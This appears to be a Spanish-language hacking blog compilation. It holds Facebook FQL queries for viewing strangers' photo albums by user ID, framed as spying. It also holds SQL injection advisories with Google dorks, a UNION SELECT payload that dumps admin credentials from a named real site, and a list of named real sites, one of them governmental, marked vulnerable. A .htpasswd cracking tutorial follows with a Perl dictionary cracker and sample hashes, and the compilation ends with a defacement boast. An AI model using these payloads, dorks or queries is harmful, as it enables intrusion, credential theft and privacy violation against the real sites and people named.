FQL (Facebook Query Language) Nos Hace Vulnerables.

Leyendo Segu-info me encontre con la noticia de que habia un problema en la configuracion de FQL (Facebook Query Language) entonces dije si el problema existe tengo que averiguar como se puede acceder a dicho contenido.
Vos a hacer un comentario que no tiene mucho que ver o tal vez si, hace poco una amiga hizo algo similar pero sin conocimientos informaticos, todo basado en la herramienta mas grande que poseemos los seres humanos (nuestro cerebro), alta ingeria social aplico ;) . Hecho el corolario pasemos a ver como podemos utilizar esta falla de configuracion a nuestro favor:

Con el siguiente codigo podremos obtener informacion de cualquier persona de facebook, con tan solo ser usuario standar (estar registrados :P).

select
aid,
cover_pid,
name,
created,
description,
location,
size,
link,
visible,
type
from
album
where
owner
in
(
select
uid1
from
friend
where
uid1 = [ID FACEBOOK A VULNERAR]
and
uid2
in
(
select
uid1,
uid2
from
friend
where
uid1 = [MI ID DE FACEBOOK]
and
(
uid2 = [ID DE MI AMIGO]
or
uid1 = [ID DE MI AMIGO]
)
)
)
ahora si prestan atencion en la imagen:



Se puede apreciar lo que remarque a las izquierda, para que ustedes pongan de la misma forma y asi poder obtener los datos del id a investigar
En este caso vemos su album de fotos, pero si siguen investigando, pueden conseguir cualquier informacion. Si alguien quiere las tablas de facebook.com aqui estan: http://wiki.developers.facebook.com/index.php/FQL_Tables
Solo es cuestion de leer un poquito mas para obtener otros datos


FUENTE: http://www.delincuentedigital.com.ar PD: GRACIAS NEGROO

PokerAr.com










Juga al Poker en argentina, gratis y online. PokerAr te ofrece la posibilidad de jugar directamente online sin necesidad de descargar software alguno como en otros servidores, Registrate y Juga.


www.PokerAr.com

Descontrolando Facebook


Cualquiera puede ver las fotos de Facebook de otra persona
sin haber sido aceptado como amigo muy fácilmente.



Se trata de un bug o error de diseño en la API de Facebook que permite acceder a las fotos de un usuario con solo saber su número de ID.
Los pasos son los siguientes:

1. Tenemos que estar logueados en FB.
2. Entrar a developers.facebook.com/tools.php
3. Elegir en el menú desplegable “método” la opción “fql.query”
4. En el cuadro de texto “query” que aparecerá ingresar la siguiente consulta:
SELECT location, link FROM album WHERE owner=idDelContacto

Donde dice “idDelContacto” ahí tenemos que reemplazar eso por la ID de la persona que queremos espiar. Ese número es muy fácil de obtener, si te paras en cualquiera de los links relativos a ella (como Agregar amigo, etc) en la URL aparece la variable id=xxxxxxx. Ese es el número de id del usuario.

Al hacer click en el botón aparecerá un código XML, del cual solo necesitas los links que están entre las etiquetas . Ese texto lo pegás en un navegador.

Si te fijas, la línea que acabas de pegar contiene el texto ( amp; ) es necesario borrar estos caracteres. a m p ; <- estos 4 caracteres. Y listo. Acceso a las fotos.

Esto sirve para tomar conciencia de la peligrosidad de subir información privada a internet. La única forma de evitarlo es incrementar los privilegios de seguridad de las fotos.

fuente: http://www.enmanosdenadie.com.ar

CMS IDEAS2 - SQL INYEXION

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Sql Inyexion
* Author: Mont
* www.argentinasecurity.com.ar
* Developer: http://ideas2.com.ar (creo)
* Dork: allinurl:"seccion_detalle.php?idseccion="

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* SqlInyexion


PoC :
http://www.WEBVICTIMA.com/[path_vulnerable]='

Login:
http://www.WEBVICTIMA.com/admin
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Paths Vulnerables



producto_categoria.php?idcategoria=

seccion_detalle.php?idseccion=

seccion_categoria.php?idcategoria=


[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Greetz:


n3xtdoor, MenteCriminal, rodr1, Em3trix, Bacan!, e #Inyexion

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Ejemplo aportado por MenteCriminal


http://www.piazzollatangoshow.com/seccion_detalle.php?idseccion=-1+UNION+SELECT+1,2,
3,4,5,concat_ws(0x3a,iduser_admin_login,usuario,password),7,8+
from+user_admin--

ideas2 : pato

--------------

WWW hacking

parte del control de acceso, la parte que estara cubierta son las directivas "authconfig". mas abajo veremos un archivo .htaccess tipico para webs con seguridad moderadamente pobre. (la mayoria de los sites porno usan esto como medida de seguridad, una practica excelente para crackear passwords)

/* a typical .htaccess file */ AuthName "Marvin Martian's Porn Emporium" AuthType Basic AuthUserFile /home/marvin/public_html/members/.htpasswd require valid-user

como vemos arriba, no hay muchas directivas para proveer proteccion con password a un directorio. como pueden ver en este caso, el webmaster fue algo olgazan y colgo el archivo .htpasswd dentro del mismo directorio. es formato del .htpasswd es simple.

en un server con seguridad pobre, no hay restricciones de acceso al archivo .htpasswd.
ya que el archivo .htpasswd esta en un directorio web-accessible, un usuario q tiene permiso de autentificarse en el directorio tiene el acceso a las listas de passwords.

simplemente entramos a la url member/.htpasswd, y recibiremos una lista full de usuarios y sus passwords encriptadas, algo estupido realmente, aunq si el archivo no existe, en un servidor mal configurado simplemente leemos el archivo .htaccess para ver donde se encuentra. si se encuentra bajo el "web-root" entonces necesitaremos un exploit-cgi para obtener el archivo. pero en cualquier otro directorio utilizaremos simplemente nuestro navegador para obtenerlo:

webmaster:TTn.VQRliM8c2 hornyguy:ZpgNeARi106aM fatmike69:drXj18zVxxBVc

desafortunadamente necesitaremos crackear estas contrasenias.

la unica manera de desencirptar estas passwords es usando la fuerza bruta.
un simple bruter en perl nos ayudara con la tarea:

#! /usr/bin/perl # crack.pl by fwaggle open (PASSFILE, ".htpasswd"); my @passfile = ; close PASSFILE; open (DICTFILE, "dictionary.txt"); my @dictfile = ; close DICTFILE; foreach $line (@passfile) { my ($username, $encpass) = split(/:/, $line); foreach $attempt (@dictfile) { if ($encpass eq crypt($attempt, $encpass)) { print("Cracked: ${username}:${attempt}\n"); } } }

aunq es recomendable usar otro cracker q funcione a mayor velocidad y en un lenguaje mas potente. (John the Ripper)

*si simplemente buscamos hackear algo o practicar buscamos el siguiente dork en google, ".htpass" y luego en los resultados entramos a los que dicen "Index of /loquesea" esos contiene el archivo .htpasswd


Ya hablamos de como romper estos passwords, ahora hablaremos un poco de como darle seguridad.
lo primero que debemos hacer es evitar q lean nuestro archivos .ht* , lo que podemos hacer como primera instancia es poner el archivo .htpasswd en algun lugar q no sea web-accessible (accesible via web).
Luego debemos negar el acceso a estos archivos a nuestros clientes (si somos los administradores de un servidor) no hay razon para q un cliente necesite ver estos archivos, ya que son de configuracion server side.

para ello usamos la siguiente directiva:
Order allow,deny Deny from all
como paso final nos aseguramos de tener suEXEC corriendo en apache, para tener acceso a los archivos solo por httpd, de esta manera podemos modificar los permisos con chmod al momento de editarlos nada mas.

Traducido para ArgentinaSecurity e Inyexion.com.ar por MONT

Noticias Valtic - Sql Inyexion

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Sql Inyexion
* Lo Encontro? Mont (Si la encontro otro llegue tarde xD AVISEN PLEASE SI ENCONTRO OTR0)
* www.argentinasecurity.com.ar
* http://www.valtic.com.ar/ (DESARROLLADOR
* Dork: allinurl:noticias/display.php?ID

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* SqlInyexion


PoC :
http://www.WEBVICTIMA.com/noticias/display.php?ID='

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Ejemplos



http://www.promositios.com/noticias/display.php?ID=%27

http://www.juegosgratisinternet.com/noticias/display.php?ID=%27

http://www.antivirusgratis.com.ar/noticias/display.php?ID=%27

http://www.tusbuscadores.com/notiprensa/display.php?ID=%27

http://descargasantivirusgratis.com/noticias/display.php?ID=%27

http://web.roldan.gov.ar/noticias.display.php?id=%27

http://www.pandaantivirus.com.ar/noticias/display.php?ID=%27

http://www.terravyt.com.ar/noticias/display.php?ID=%27

http://www.labradorygolden.com.ar/noticias/display.php?ID=%27

http://www.september11.com.ar/noticias/display.php?ID=%27

http://www.hotelennewyork.com/noticias/display.php?ID=%27

http://www.hotelenbrasil.com/noticias/display.php?ID=%27

Cronica Owned by Mont & Bacan



Los links a los demas screenshots:
http://img14.imageshack.us/img14/1664/cronicaowned.jpg
http://img14.imageshack.us/img14/6922/cronicaowned3.jpg
http://img15.imageshack.us/img15/4373/cronicaowned4.jpg
http://img15.imageshack.us/img15/3589/cronicaowned2.jpg